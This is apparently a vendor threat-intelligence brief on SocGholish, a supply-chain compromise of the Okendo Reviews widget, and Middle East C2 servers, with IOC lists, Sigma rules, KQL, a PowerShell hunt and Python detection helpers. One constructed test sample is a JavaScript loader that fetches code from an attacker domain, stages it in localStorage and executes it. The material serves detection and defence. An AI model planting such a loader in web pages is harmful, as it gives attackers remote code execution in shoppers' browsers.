Threat Summary
Recent OTX pulses highlight a complex threat landscape involving the disruption of a major malware distributor, the emergence of a sophisticated supply chain attack, and the exposure of massive nation-state-aligned C2 infrastructure. Operation Endgame has disrupted the GOLD PRELUDE (TA569) SocGholish campaign, taking down 106 servers, but secondary payloads like IcedID and Pikabot remain a threat. Concurrently, threat actor SmartApeSG has launched a supply chain attack via the Okendo Reviews widget, injecting malicious JavaScript to deploy NetSupport RAT and Remcos. Furthermore, intelligence reveals over 1,350 C2 servers concentrated in the Middle East (hosted largely by STC) facilitating campaigns by APT28, ENERGETIC BEAR, and others using IoT botnets and commodity RATs.
Threat Actor / Malware Profile
GOLD PRELUDE (TA569) & SocGholish
- Profile: Prolific initial access broker and malware distributor active since 2017.
- Distribution: SEO poisoning and compromised WordPress sites delivering fake browser update prompts.
- Payloads: SocGholish (JS loader) leading to IcedID, QakBot, Pikabot, and Rhadamanthys.
- Behavior: The fake browser updates trick users into executing malicious JScript, which establishes a foothold for loader malware.
SmartApeSG
- Profile: Threat actor targeting the e-commerce sector.
- Distribution: Supply chain compromise via the Okendo Reviews widget (customer review platform).
- Payloads: NetSupport Manager, Remcos RAT, StealC.
- Behavior: Malicious JavaScript is injected into legitimate e-commerce pages through the widget file (okendo-reviews.js). It uses localStorage for staging and obfuscation to load remote payloads.
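The behaviour above, and the third-party script audit recommended later in this brief, come down to one check: does the script your shoppers are actually served match the copy you reviewed, and does it carry loader traits? The following is an added example written for this brief, not Security Arsenal's tooling or Okendo's code. The allowlisted host, the heuristic regexes and both sample scripts are constructed for the example; the "tampered" sample only imitates the staging pattern described above and is not the real injected code.

```python
import hashlib
import re
from urllib.parse import urlparse

# Hosts the widget is expected to contact. Constructed allowlist for this example;
# in practice it comes from the vendor's documentation and your own CSP.
ALLOWED_HOSTS = {"cdn-static.okendo.io"}

# Heuristic traits of the loader pattern described above (assumed indicators,
# not signatures taken from the pulse): browser-storage staging, decode-then-
# execute, and dynamic loading of remote code.
STAGING = re.compile(r"localStorage\.(setItem|getItem)\(")
DECODE_EXEC = re.compile(r"\b(atob|eval|Function)\(")
LOADER = re.compile(r"fetch\(|XMLHttpRequest|createElement\(\s*['\"]script['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def audit_script(text: str, baseline_sha256: str) -> dict:
    """Compare a served third-party script with a pinned baseline and flag loader traits."""
    digest = hashlib.sha256(text.encode("utf-8")).hexdigest()
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    unexpected = sorted(h for h in hosts if h and h not in ALLOWED_HOSTS)
    findings = []
    if STAGING.search(text):
        findings.append("browser-storage staging")
    if DECODE_EXEC.search(text):
        findings.append("decode-then-execute")
    if LOADER.search(text) and unexpected:
        findings.append("remote load from unexpected host")
    return {
        "sha256": digest,
        "matches_baseline": digest == baseline_sha256,
        "unexpected_hosts": unexpected,
        "findings": findings,
    }


# Constructed samples: a minimal stand-in for a clean widget, and the same file with
# a staging loader appended. Neither is the real okendo-reviews.js.
CLEAN = (
    "(function(){var w=document.getElementById('okendo-reviews');"
    "w.textContent='reviews';})();\n"
)
TAMPERED = CLEAN + (
    "(function(){var k='okdo_s';var p=localStorage.getItem(k);"
    "if(!p){fetch('https://api.wigetticks.com/v1/c').then(r=>r.text())"
    ".then(t=>{localStorage.setItem(k,t);});}"
    "else{var s=document.createElement('script');s.text=atob(p);"
    "document.head.appendChild(s);}})();\n"
)
BASELINE_SHA256 = hashlib.sha256(CLEAN.encode("utf-8")).hexdigest()

if __name__ == "__main__":
    for name, body in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, audit_script(body, BASELINE_SHA256))
```

Run it against the script body fetched from the CDN on a schedule and alert on a hash change; the pattern findings then tell the analyst whether the change looks like a vendor release or a loader. Because the attacker modified the vendor's own file, Subresource Integrity only helps where the vendor serves a version-pinned URL you can hash in advance.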
Malware Families
- NetSupport Manager / Remcos RAT: NetSupport Manager is a commercial remote administration tool; Remcos is sold as one but is seen almost exclusively in malicious use. Both are abused for C2 and give the operator full system control, file transfer, and credential harvesting.
- SocGholish: A JavaScript-based malware framework designed to drop and execute subsequent payloads.
- IcedID / Pikabot: IcedID (a banking trojan repurposed as a loader) and Pikabot (a loader) are used for credential theft and to hand off access for lateral movement and follow-on payloads.
IOC Analysis
- Indicator Types:
  - Hostnames: A large set of compromised WordPress domains (e.g., trademark.iglesiaelarca.com, billing.roofnrack.us) used for payload delivery by SocGholish.
  - URLs: Specific malicious endpoints used in the Okendo attack (api.wigetticks.com, api.wizzleticks.com) and the compromised widget URL (cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js).
  - CVE: CVE-2025-11953 (associated with the Middle East infrastructure activity).
- Operationalization: SOC teams should ingest the list of hostnames into web proxy blocklists and DNS firewalls. The URLs should be blocked at the gateway. CVE-2025-11953 requires immediate patching assessment.
- Tooling: Web proxies (Zscaler/Cisco) for URL and hostname blocking, EDR telemetry (CrowdStrike/SentinelOne) for process and network hits, and SIEM correlation (Splunk/Microsoft Sentinel).
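The operationalization step hides a routing decision: hostname IOCs belong in a DNS firewall, the widget URL belongs at the proxy, and the CVE goes to vulnerability management. Sinking cdn-static.okendo.io at DNS because one path on it was compromised would break the widget for every Okendo-backed storefront. The following is an added example of that routing, written for this brief rather than taken from the page or from any vendor's tooling; the shared-infrastructure allowlist is an assumption for the example.

```python
from urllib.parse import urlsplit

# Indicators as listed in this brief: hostnames, one full URL, one CVE.
RAW_IOCS = [
    "trademark.iglesiaelarca.com",
    "billing.roofnrack.us",
    "api.wigetticks.com",
    "api.wizzleticks.com",
    "cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js",
    "CVE-2025-11953",
]

# Hosts that must not be sunk at DNS even though an IOC lives under them: the
# vendor's CDN serves the widget for every customer. Assumed list for the example.
SHARED_INFRA = {"cdn-static.okendo.io"}


def classify_iocs(iocs):
    """Route each IOC to the control that can act on it without collateral damage."""
    dns_blocklist, proxy_urls, cves, review = set(), set(), set(), []
    for raw in iocs:
        ioc = raw.strip().lower()
        if ioc.startswith("cve-"):
            cves.add(ioc.upper())
            continue
        parts = urlsplit(ioc if "://" in ioc else "http://" + ioc)
        host = parts.hostname or ""
        if not host:
            review.append(raw)
            continue
        if parts.path not in ("", "/"):
            # URL-level IOC: an exact path match belongs at the proxy/gateway
            proxy_urls.add(host + parts.path)
            if host not in SHARED_INFRA:
                dns_blocklist.add(host)
        elif host in SHARED_INFRA:
            review.append(raw)      # bare shared host: needs a human decision
        else:
            dns_blocklist.add(host)
    return {
        "dns_blocklist": sorted(dns_blocklist),
        "proxy_urls": sorted(proxy_urls),
        "cves": sorted(cves),
        "review": review,
    }


def to_rpz(hosts):
    """Render hostnames as Response Policy Zone records (NXDOMAIN via CNAME to the root)."""
    return [f"{h} CNAME ." for h in hosts]


if __name__ == "__main__":
    result = classify_iocs(RAW_IOCS)
    print("\n".join(to_rpz(result["dns_blocklist"])))
    print("proxy:", result["proxy_urls"])
    print("cves:", result["cves"], "review:", result["review"])
```

The RPZ lines can be dropped into a BIND or Infoblox policy zone; the proxy list is the exact-match URL category for the gateway. Anything that lands in review (a bare hostname that is shared infrastructure) is a judgement call, not something to automate.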
Detection Engineering
Sigma Rules
---
title: Potential Fake Browser Update Execution - SocGholish
description: Detects a Windows script host launched with a command line that names a browser or an update and a .js/.jse file, the execution pattern of the SocGholish (TA569) fake browser update lure.
status: experimental
date: 2026-06-22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/63567491-9a02-4e9d-8c89-7d5e5a1b3c61/
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
    selection_cli:
        CommandLine|contains:
            - 'update'
            - 'browser'
            - 'chrome.exe'
            - 'iexplore.exe'
    selection_extension:
        CommandLine|contains:
            - '.js'
            - '.jse'
    condition: all of selection_*
falsepositives:
    - Legitimate software update scripts run through wscript/cscript; tune on parent process or script path
level: high
---
title: Suspicious Connection to Okendo Supply Chain C2
description: Detects network connections to domains associated with the SmartApeSG Okendo Reviews supply chain attack.
status: experimental
date: 2026-06-22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/63567491-9a02-4e9d-8c89-7d5e5a1b3c62/
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
    product: windows
detection:
    # Sysmon Event ID 3 fills DestinationHostname from reverse DNS and it is often empty;
    # pair this rule with a dns_query rule on QueryName for the same domains.
    selection:
        DestinationHostname|contains:
            - 'wigetticks.com'
            - 'wizzleticks.com'
    condition: selection
falsepositives:
    - Unknown
level: critical
---
title: Remote Access Tool Execution - NetSupport and Remcos
description: Detects execution of remote access tools dropped by the Okendo supply chain attack or by SocGholish loaders, by image name or by PE OriginalFileName so a renamed binary is still caught.
status: experimental
date: 2026-06-22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/63567491-9a02-4e9d-8c89-7d5e5a1b3c62/
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\client32.exe'
            - '\remcos.exe'
            - '\gps.exe'
    selection_ofn:
        OriginalFileName:
            - 'client32.exe'
            - 'remcos.exe'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administrative use of NetSupport Manager (rare; baseline the install path)
level: high
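The two process-creation rules above differ in how their selections combine: the SocGholish rule needs all three selections at once, the RAT rule fires on either. The following added example (written for this brief, not part of the page or of any Sigma backend) runs both rules' logic over constructed process-creation events so the behaviour of each condition, including the false positive the first rule admits, can be seen on concrete input. All paths, user names and command lines are invented.

```python
# Process-creation events as a rule sees them. Constructed samples; the paths,
# user names and command lines are invented for this example.
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Chrome.Update.js"',
     "OriginalFileName": "wscript.exe"},
    {"id": 2, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\ProgramData\Vendor\update.vbs',
     "OriginalFileName": "wscript.exe"},
    {"id": 3, "Image": r"C:\Users\bob\AppData\Roaming\NetSupport\client32.exe",
     "CommandLine": r'"C:\Users\bob\AppData\Roaming\NetSupport\client32.exe"',
     "OriginalFileName": "client32.exe"},
    {"id": 4, "Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",      # renamed binary
     "CommandLine": r'"C:\Users\bob\AppData\Local\Temp\svchost.exe"',
     "OriginalFileName": "remcos.exe"},
    {"id": 5, "Image": r"C:\Windows\System32\cscript.exe",                  # admin inventory job
     "CommandLine": r"cscript.exe //nologo C:\Windows\Temp\update_inventory.js",
     "OriginalFileName": "cscript.exe"},
]

# Values mirror the Sigma rules above; comparisons are case-insensitive as in Sigma.
SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe", "\\mshta.exe")
LURE_TERMS = ("update", "browser", "chrome.exe", "iexplore.exe")
SCRIPT_EXTS = (".js", ".jse")
RAT_IMAGES = ("\\client32.exe", "\\remcos.exe", "\\gps.exe")
RAT_ORIGINAL_NAMES = ("client32.exe", "remcos.exe")


def fake_update_execution(ev):
    """All three selections must match (Sigma: all of selection_*)."""
    image = ev.get("Image", "").lower()
    cli = ev.get("CommandLine", "").lower()
    return (image.endswith(SCRIPT_HOSTS)
            and any(t in cli for t in LURE_TERMS)
            and any(x in cli for x in SCRIPT_EXTS))


def rat_execution(ev):
    """Either selection suffices (Sigma: 1 of selection_*); OriginalFileName catches a renamed binary."""
    image = ev.get("Image", "").lower()
    ofn = ev.get("OriginalFileName", "").lower()
    return image.endswith(RAT_IMAGES) or ofn in RAT_ORIGINAL_NAMES


RULES = (
    ("SocGholish fake update", fake_update_execution),
    ("RAT execution", rat_execution),
)


def triage(events):
    """Return (event id, rule title) for every rule each event trips."""
    return [(ev["id"], title) for ev in events for title, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for event_id, title in triage(EVENTS):
        print(f"event {event_id}: {title}")
```

Event 5 is the false positive the first rule's falsepositives field warns about: a scheduled cscript job whose script happens to be called update_inventory.js. In production, add a filter on the parent process (e.g. a task scheduler or management agent) or on a trusted script directory rather than loosening the lure terms. Event 4 shows why the RAT rule keeps the OriginalFileName selection: the image name alone would never match.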
KQL (Microsoft Sentinel)
// Hunt for connections to known malicious domains from Okendo and SocGholish pulses
let SocGholishHosts = dynamic([
    'trademark.iglesiaelarca.com',
    'content.garretttrails.org',
    'promo.summat10n.org',
    'billing.roofnrack.us',
    'devel.asurans.com',
    'storehouse.beautysupplysalonllc.com',
    'samples.addisgraphix.com',
    'api-app.uppercrafteroom.com'
]);
let SmartApeSGHosts = dynamic(['api.wigetticks.com', 'api.wizzleticks.com']);
// cdn-static.okendo.io is the vendor's legitimate CDN: match the compromised path, not the host,
// and treat a hit as "widget loaded, verify integrity" rather than as C2.
let OkendoWidgetPath = 'cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js';
// RemoteUrl is only populated when the sensor observed a hostname (DNS, proxy, TLS); plain TCP
// connections carry only RemoteIP, so pair this with DNS telemetry for full coverage.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (SocGholishHosts)
    or RemoteUrl has_any (SmartApeSGHosts)
    or RemoteUrl contains OkendoWidgetPath
| extend Classification = case(
    RemoteUrl has_any (SmartApeSGHosts), 'SmartApeSG C2',
    RemoteUrl contains OkendoWidgetPath, 'Okendo widget load (verify integrity)',
    'SocGholish compromised site')
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, Classification
PowerShell Hunt Script
# IOC Hunt for SmartApeSG and RAT artifacts
Write-Host "[+] Hunting for Okendo Supply Chain and RAT artifacts..."

# 1. Check DNS cache for malicious domains
$MaliciousDomains = @(
    "api.wigetticks.com",
    "api.wizzleticks.com",
    "trademark.iglesiaelarca.com",
    "billing.roofnrack.us"
)
# Get-DnsClientCache exists on Windows 8 / Server 2012 and later. The cache is volatile,
# so an empty result is not a clean bill of health; correlate with DNS server or EDR logs.
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object { $MaliciousDomains -contains $_.Entry }
if ($DnsCache) {
    Write-Host "[!] WARNING: Found DNS cache entries for malicious domains:" -ForegroundColor Red
    $DnsCache | Format-Table Entry, Data, TimeToLive
} else {
    Write-Host "[-] No malicious DNS cache entries found." -ForegroundColor Green
}

# 2. Check for known RAT processes
# Get-Process returns ProcessName without the .exe extension, so list the names without it;
# comparing against "client32.exe" would never match.
$RatProcesses = @("client32", "remcos", "gps")
$Lolbins = @("regasm", "msbuild")   # legitimate .NET utilities often abused for evasion: review, do not auto-block
$RunningProcs = Get-Process | Where-Object { $RatProcesses -contains $_.ProcessName }
if ($RunningProcs) {
    Write-Host "[!] WARNING: Found suspicious RAT processes running:" -ForegroundColor Red
    $RunningProcs | Format-Table ProcessName, Id, Path
} else {
    Write-Host "[-] No known RAT processes found." -ForegroundColor Green
}
$LolbinProcs = Get-Process | Where-Object { $Lolbins -contains $_.ProcessName }
if ($LolbinProcs) {
    Write-Host "[*] Note: regasm/msbuild running; confirm the parent process and command line:" -ForegroundColor Yellow
    $LolbinProcs | Format-Table ProcessName, Id, Path
}
# A renamed RAT keeps its PE OriginalFilename; check that too (needs admin to read other users' processes)
$Masquerading = Get-Process | Where-Object { $_.Path } | Where-Object {
    $ofn = (Get-Item $_.Path -ErrorAction SilentlyContinue).VersionInfo.OriginalFilename
    @("client32.exe", "remcos.exe") -contains $ofn
}
if ($Masquerading) {
    Write-Host "[!] WARNING: Process with a RAT OriginalFilename running under another name:" -ForegroundColor Red
    $Masquerading | Format-Table ProcessName, Id, Path
}

# 3. Check for suspicious file modifications in Okendo paths (if applicable)
# The widget is normally served from the vendor CDN; this only matters if a copy is self-hosted.
$OkendoPaths = @("C:\inetpub\wwwroot", "C:\xampp\htdocs") # Common web roots
Write-Host "[*] Checking for okendo-reviews.js modifications in common web roots..."
foreach ($path in $OkendoPaths) {
    if (Test-Path $path) {
        $files = Get-ChildItem -Path $path -Recurse -Filter "okendo-reviews.js" -ErrorAction SilentlyContinue
        if ($files) {
            Write-Host "[!] Found Okendo Review Widget files. Verify integrity manually:" -ForegroundColor Yellow
            $files | Select-Object FullName, LastWriteTime, Length
        }
    }
}
Response Priorities
Immediate (0-24h)
- Block IOCs: Immediately block all listed hostnames at the DNS firewall and web proxy, and the compromised widget URL at the gateway. Match the widget by full path rather than sinking cdn-static.okendo.io itself, which is the vendor's legitimate CDN and serves every Okendo-backed storefront.
- Quarantine: Identify and quarantine systems communicating with wigetticks.com or wizzleticks.com.
- Patch: Assess exposure to CVE-2025-11953 in the environment.
24h - 48h
- Web Server Forensics: If you run WordPress or embed the Okendo widget, scan for the specific IOCs (okendo-reviews.js modifications, unauthorized plugins) and compare the widget your pages actually load against a known-good copy.
- Credential Reset: Force password resets for accounts on machines where NetSupport RAT or Remcos activity was suspected.
1 Week
- Supply Chain Audit: Review all third-party JavaScript integrations (e.g., widgets, chatbots) for unauthorized modifications.
- Architectural Hardening: Implement a strict Content Security Policy (CSP) with an explicit connect-src, so that code injected into an allowed third-party script cannot fetch second-stage payloads from attacker-controlled domains. CSP alone will not stop a tampered copy of an allowed script from loading, so pair it with integrity monitoring of third-party scripts and with Subresource Integrity wherever the vendor serves version-pinned files.
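Whether a CSP actually contains this attack depends on the source expressions, not on the presence of a header. The following added example (written for this brief; it is not Security Arsenal's tooling and not a full CSP implementation) evaluates a weak policy and a strict one against the fetch an injected loader would make. Both policies, the page origin and vendor-api.example.com are constructed; the latter is a placeholder for the widget's legitimate API origin, not a real Okendo hostname. The matcher is simplified: it does not normalise default ports or handle nonces and hashes.

```python
from urllib.parse import urlsplit

# Fetch directives fall back to default-src when absent.
FALLBACK = {"connect-src": "default-src", "script-src": "default-src"}


def parse_policy(policy):
    """Split 'directive src src; directive src' into a dict of lower-cased source lists."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def _source_matches(src, page, target):
    """Simplified CSP source-expression matching (default ports are not normalised)."""
    if src == "'none'":
        return False
    if src == "*":
        return target.scheme in ("http", "https", "ws", "wss")
    if src == "'self'":
        return (target.scheme, target.hostname, target.port) == (page.scheme, page.hostname, page.port)
    if src.endswith(":") and "/" not in src:            # scheme-source such as https:
        return target.scheme == src[:-1]
    spec = urlsplit(src if "://" in src else "//" + src)  # host-source, optional scheme/port
    if not spec.hostname:
        return False
    if spec.scheme and spec.scheme != target.scheme:
        return False
    host = target.hostname or ""
    if spec.hostname.startswith("*."):
        if not host.endswith(spec.hostname[1:]):
            return False
    elif spec.hostname != host:
        return False
    return spec.port is None or spec.port == target.port


def csp_allows(policy, directive, page_origin, target_url):
    """Would a page at page_origin be allowed to load/connect to target_url under this policy?"""
    directives = parse_policy(policy)
    sources = directives.get(directive)
    if sources is None:
        sources = directives.get(FALLBACK.get(directive, ""))
    if sources is None:
        return True   # no governing directive: the browser imposes no restriction
    page, target = urlsplit(page_origin), urlsplit(target_url)
    return any(_source_matches(s, page, target) for s in sources)


# Constructed policies. vendor-api.example.com is a placeholder for the widget's
# legitimate API origin, not a real Okendo hostname.
PAGE = "https://shop.example.com"
WEAK_CSP = "default-src 'self' https:; script-src 'self' https://cdn-static.okendo.io"
STRICT_CSP = ("default-src 'self'; "
              "script-src 'self' https://cdn-static.okendo.io; "
              "connect-src 'self' https://vendor-api.example.com")
C2_FETCH = "https://api.wigetticks.com/v1/c"
WIDGET = "https://cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js"

if __name__ == "__main__":
    print("weak   allows C2 fetch:", csp_allows(WEAK_CSP, "connect-src", PAGE, C2_FETCH))
    print("strict allows C2 fetch:", csp_allows(STRICT_CSP, "connect-src", PAGE, C2_FETCH))
    print("strict allows vendor API:", csp_allows(STRICT_CSP, "connect-src", PAGE, "https://vendor-api.example.com/reviews"))
    print("strict still loads widget:", csp_allows(STRICT_CSP, "script-src", PAGE, WIDGET))
```

The weak policy's `https:` in default-src is the common mistake: it looks restrictive but lets any HTTPS origin serve as a payload source, so the injected fetch to api.wigetticks.com succeeds. The strict policy blocks that fetch while the legitimate vendor API keeps working. Note the last line: the strict policy still loads the widget from cdn-static.okendo.io, because that is the allowed origin the attacker tampered with; that gap is what the integrity monitoring in the audit step closes.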